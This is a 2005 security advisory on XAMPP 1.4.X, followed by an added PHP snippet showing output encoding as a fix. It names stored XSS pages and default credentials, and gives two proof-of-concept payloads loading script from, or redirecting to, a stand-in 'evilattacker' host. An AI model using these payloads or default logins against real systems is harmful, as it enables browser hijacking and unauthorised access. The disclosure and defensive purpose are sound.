
Exploit Labs Security Advisory 2005.6

Date: 18 Apr 2005
Reported by: Exploit Labs
Type: packetstorm
Source: packetstormsecurity.com

XAMPP security advisory reveals vulnerabilities in versions 1.4.X across multiple platforms.

Code
`------------------------------------------------------------  
- EXPL-A-2005-006 exploitlabs.com Advisory 034 -  
------------------------------------------------------------  
- XAMPP -  
  
  
  
OVERVIEW  
========  
XAMPP is an easy to install Apache distribution containing MySQL,  
PHP and Perl. XAMPP is really very easy to install and to use  
- just download, extract and start  
  
http://www.apachefriends.org/en/xampp.html  
  
  
  
AFFECTED PRODUCTS  
=================  
Windows Version 1.4.X  
http://www.apachefriends.org/en/xampp-windows.html  
  
Linux 1.4.X ( all )  
http://www.apachefriends.org/en/xampp-linux.html  
  
Solaris 0.3 ( all )  
http://www.apachefriends.org/en/xampp-solaris.html  
  
  
  
DETAILS  
=======  
1.  
persistent XSS is present in user supplied input fields  
allowing attackers to render any javascript in the user's browser.  
some javascript will break the application, disallowing further  
user input to the script.  
  
http://[host]/xampp/cds.php  
http://[host]/xampp/guestbook-en.pl ( linux )  
http://[host]/xampp/phonebook.php  
  
  
  
2.  
default / install usernames and passwords  
  
by viewing http://[host]/xampp/security.php XAMPP discloses  
usernames / passwords ( example below )  
  
  
Item 2a  
-------  
The phpMyAdmin user pma has no password UNSECURE  
phpMyAdmin saves your preferences in an extra MySQL database. To access  
this data  
phpMyAdmin uses the special user pma. This user has in the default  
installation no  
password set and to avoid any security problems you should give him a  
passwort.  
  
Item 2b  
-------  
The MySQL user root has no password UNSECURE  
Every local user on Linux box can access your MySQL database with  
administrator rights.  
You should set a password.  
  
Item 2c  
-------  
The FTP password for user nobody is still 'lampp' UNSECURE  
By using the default password for the FTP user nobody everyone can upload  
and change  
files for your XAMPP webserver. So if you enabled ProFTPD you should set a  
new password  
for user nobody.  
  
Item 2d  
-------  
Tomcat Admin/Config User for XAMPP:  
User: xampp  
Password: xampp  
  
  
  
PROOF OF CONCEPT  
=================  
  
Item 1a  
--------  
http://[host]/xampp/cds.php  
enter text...  
<script language=JavaScript src=http://evilattacker/js.js></script>  
  
stores values in the mysql database  
  
also 1c  
  
Item 1b  
--------  
http://[host]/xampp/guestbook-en.pl  
see 1c  
  
Item 1c  
--------  
http://[host]/xampp/phonebook.php  
enter into an input field...  
  
<iframe src=http://evilatacker></iframe>  
  
and when rendered forcibly redirects the user to http://evilattacker  
  
  
  
SOLUTION  
========  
none ( see vendor response )  
  
vendor response:  
----------------  
  
Dear Donnie!  
  
> you have a severely insecure package.  
> here are my raw notes.  
  
Thank you for your notes. But XAMPP is meant only for internal  
development usage and not on production systems.  
  
See http://www.apachefriends.org/en/xampp.html  
(section "The philosopy")  
  
The vulnerable scripts are only very simple demonstration programs to  
test the functions of Apache/MySQL/etc. and to give beginners first  
inspirations in programming.  
Also these scripts are not meant for public usage.  
  
But you may be right. We should make the warning messages about the  
dangers of use for our software bigger.  
  
  
researcher comment:  
-------------------  
  
a disclaimer of this type does not mitigate the security issues  
present in XAMPP. this package is targeted at beginners, the very  
users who need to be protected the most and taught secure by default.  
  
  
  
  
  
CREDITS  
=======  
This vulnerability was discovered and researched by  
Donnie Werner of Exploitlabs  
  
Donnie Werner  
Information Security Specialist  
[email protected]  
  
--   
web: http://exploitlabs.com  
http://exploitlabs.com/files/advisories/EXPL-A-2005-006-xampp.txt  
`
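
The advisory lists no fix for the stored XSS in item 1. The following is an added example, not code from the advisory or from XAMPP, showing the unencoded output pattern beside an output-encoded form; the function names are hypothetical and the sample rows reuse the two strings quoted in the proof of concept.

```php
<?php
// Added illustration; function names are hypothetical and this is not XAMPP code.

// Constructed sample rows: one benign entry plus the two strings quoted in
// the advisory's proof of concept (items 1a and 1c), copied verbatim.
$rows = [
    'Abbey Road',
    '<script language=JavaScript src=http://evilattacker/js.js></script>',
    '<iframe src=http://evilatacker></iframe>',
];

// Pattern the advisory describes: the stored value is written into the page
// unchanged, so the browser parses it as markup.
function render_unsafe(string $value): string
{
    return '<td>' . $value . '</td>';
}

// Hardened form: encode for the HTML context at output time.
// ENT_QUOTES also encodes ' and ", ENT_SUBSTITUTE keeps invalid UTF-8 from
// turning the whole value into an empty string.
function render_safe(string $value): string
{
    return '<td>' . htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</td>';
}

// True when the cell body still contains a raw '<', i.e. live markup.
function has_live_markup(string $cell): bool
{
    $body = substr($cell, strlen('<td>'), -strlen('</td>'));
    return strpos($body, '<') !== false;
}

foreach ($rows as $row) {
    $unsafe = render_unsafe($row);
    $safe   = render_safe($row);
    printf(
        "unsafe live markup: %-3s | safe live markup: %-3s | %s\n",
        has_live_markup($unsafe) ? 'yes' : 'no',
        has_live_markup($safe) ? 'yes' : 'no',
        $safe
    );
}
```

Encoding at output time, rather than when the value is stored, also neutralises rows that were already saved in the database before the fix.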
